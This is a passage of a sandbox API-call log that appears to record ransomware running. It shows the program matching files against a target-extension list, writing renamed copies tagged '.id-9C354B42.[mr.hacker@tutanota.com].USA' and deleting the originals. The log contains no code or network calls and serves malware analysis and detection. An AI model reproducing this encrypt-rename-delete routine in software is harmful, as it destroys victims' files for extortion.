returned 1 [0045.352] lstrlenW (lpString=".xlsx") returned 5 [0045.352] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.352] lstrlenW (lpString=".ppt") returned 4 [0045.352] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.352] lstrlenW (lpString=".zip") returned 4 [0045.352] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.352] lstrlenW (lpString=".rar") returned 4 [0045.352] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.352] lstrlenW (lpString=".bz2") returned 4 [0045.352] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.352] lstrlenW (lpString=".7z") returned 3 [0045.352] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.352] lstrlenW (lpString=".dbf") returned 4 [0045.352] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.352] lstrlenW (lpString=".1cd") returned 4 [0045.352] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.352] lstrlenW (lpString=".jpg") returned 4 [0045.352] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.353] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0045.353] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.353] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=28595) returned 1 [0045.353] CloseHandle (hObject=0x210) returned 1 [0045.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 0x20 [0045.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.353] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.353] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0045.354] GetLastError () returned 0x0 [0045.354] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x6fb3, lpOverlapped=0x0) returned 1 [0045.357] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6fc0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x6fc0, lpOverlapped=0x0) returned 1 [0045.359] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.359] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.359] SetEndOfFile (hFile=0x1f0) returned 1 [0045.359] CloseHandle (hObject=0x1f0) returned 1 [0045.359] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.359] SetEndOfFile (hFile=0x210) returned 1 [0045.360] CloseHandle (hObject=0x210) returned 1 [0045.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.360] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 1 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString=".doc") returned 4 [0045.361] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.361] lstrlenW (lpString=".docx") returned 5 [0045.361] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.361] lstrlenW (lpString=".pdf") returned 4 [0045.361] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.361] lstrlenW (lpString=".xls") returned 4 [0045.361] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.361] lstrlenW (lpString=".xlsx") returned 5 [0045.361] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.361] lstrlenW (lpString=".ppt") returned 4 [0045.361] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString=".zip") returned 4 [0045.361] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.361] lstrlenW (lpString=".rar") returned 4 [0045.361] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.361] lstrlenW (lpString=".bz2") returned 4 [0045.361] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.361] lstrlenW (lpString=".7z") returned 3 [0045.361] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString=".dbf") returned 4 [0045.361] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString=".1cd") returned 4 [0045.361] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString=".jpg") returned 4 [0045.361] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.361] lstrlenW (lpString=".doc") returned 4 [0045.362] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.362] lstrlenW (lpString=".docx") returned 5 [0045.362] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.362] lstrlenW (lpString=".pdf") returned 4 [0045.362] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.362] lstrlenW (lpString=".xls") returned 4 [0045.362] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.362] lstrlenW (lpString=".xlsx") returned 5 [0045.362] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.362] lstrlenW (lpString=".ppt") returned 4 [0045.362] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.362] lstrlenW (lpString=".zip") returned 4 [0045.362] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.362] lstrlenW (lpString=".rar") returned 4 [0045.362] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.362] lstrlenW (lpString=".bz2") returned 4 [0045.362] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.362] lstrlenW (lpString=".7z") returned 3 [0045.362] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.362] lstrlenW (lpString=".dbf") returned 4 [0045.362] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.362] lstrlenW (lpString=".1cd") returned 4 [0045.362] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0045.362] lstrlenW (lpString=".jpg") returned 4 [0045.362] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.362] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0045.362] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.363] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3957) returned 1 [0045.363] CloseHandle (hObject=0x210) returned 1 [0045.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 0x20 [0045.363] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.363] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.363] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.021] GetLastError () returned 0x0 [0046.021] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xf75, lpOverlapped=0x0) returned 1 [0046.024] WriteFile (in: hFile=0x1fc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xf80, lpOverlapped=0x0) returned 1 [0046.025] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.025] WriteFile (in: hFile=0x1fc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.025] SetEndOfFile (hFile=0x1fc) returned 1 [0046.026] CloseHandle (hObject=0x1fc) returned 1 [0046.026] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.026] SetEndOfFile (hFile=0x210) returned 1 [0046.026] CloseHandle (hObject=0x210) returned 1 [0046.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.027] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 1 [0046.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.027] lstrlenW (lpString=".doc") returned 4 [0046.027] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.027] lstrlenW (lpString=".docx") returned 5 [0046.027] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.027] lstrlenW (lpString=".pdf") returned 4 [0046.027] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.027] lstrlenW (lpString=".xls") returned 4 [0046.027] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.027] lstrlenW (lpString=".xlsx") returned 5 [0046.027] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.027] lstrlenW (lpString=".ppt") returned 4 [0046.027] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.027] lstrlenW (lpString=".zip") returned 4 [0046.027] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.027] lstrlenW (lpString=".rar") returned 4 [0046.027] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.027] lstrlenW (lpString=".bz2") returned 4 [0046.027] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.027] lstrlenW (lpString=".7z") returned 3 [0046.027] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.028] lstrlenW (lpString=".dbf") returned 4 [0046.028] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.028] lstrlenW (lpString=".1cd") returned 4 [0046.028] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.028] lstrlenW (lpString=".jpg") returned 4 [0046.028] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.028] lstrlenW (lpString=".doc") returned 4 [0046.028] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.028] lstrlenW (lpString=".docx") returned 5 [0046.028] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.028] lstrlenW (lpString=".pdf") returned 4 [0046.028] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.028] lstrlenW (lpString=".xls") returned 4 [0046.028] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.028] lstrlenW (lpString=".xlsx") returned 5 [0046.028] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.028] lstrlenW (lpString=".ppt") returned 4 [0046.028] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.028] lstrlenW (lpString=".zip") returned 4 [0046.028] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.028] lstrlenW (lpString=".rar") returned 4 [0046.028] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.028] lstrlenW (lpString=".bz2") returned 4 [0046.028] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.028] lstrlenW (lpString=".7z") returned 3 [0046.028] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.028] lstrlenW (lpString=".dbf") returned 4 [0046.028] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.029] lstrlenW (lpString=".1cd") returned 4 [0046.029] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.029] lstrlenW (lpString=".jpg") returned 4 [0046.029] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.029] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.029] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.029] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=32403) returned 1 [0046.029] CloseHandle (hObject=0x210) returned 1 [0046.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 0x20 [0046.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.030] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.030] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.030] GetLastError () returned 0x0 [0046.030] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x7e93, lpOverlapped=0x0) returned 1 [0046.038] WriteFile (in: hFile=0x1fc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x7ea0, lpOverlapped=0x0) returned 1 [0046.041] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.041] WriteFile (in: hFile=0x1fc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.041] SetEndOfFile (hFile=0x1fc) returned 1 [0046.041] CloseHandle (hObject=0x1fc) returned 1 [0046.041] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.041] SetEndOfFile (hFile=0x210) returned 1 [0046.042] CloseHandle (hObject=0x210) returned 1 [0046.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.042] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 1 [0046.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.043] lstrlenW (lpString=".doc") returned 4 [0046.043] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.043] lstrlenW (lpString=".docx") returned 5 [0046.043] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.043] lstrlenW (lpString=".pdf") returned 4 [0046.043] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.043] lstrlenW (lpString=".xls") returned 4 [0046.043] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.043] lstrlenW (lpString=".xlsx") returned 5 [0046.043] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.043] lstrlenW (lpString=".ppt") returned 4 [0046.043] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.043] lstrlenW (lpString=".zip") returned 4 [0046.043] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.043] lstrlenW (lpString=".rar") returned 4 [0046.043] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.043] lstrlenW (lpString=".bz2") returned 4 [0046.043] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.043] lstrlenW (lpString=".7z") returned 3 [0046.043] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.043] lstrlenW (lpString=".dbf") returned 4 [0046.043] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.043] lstrlenW (lpString=".1cd") returned 4 [0046.043] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.043] lstrlenW (lpString=".jpg") returned 4 [0046.043] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.043] lstrlenW (lpString=".doc") returned 4 [0046.043] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.043] lstrlenW (lpString=".docx") returned 5 [0046.043] lstrcmpiW (lpString1=".docx", 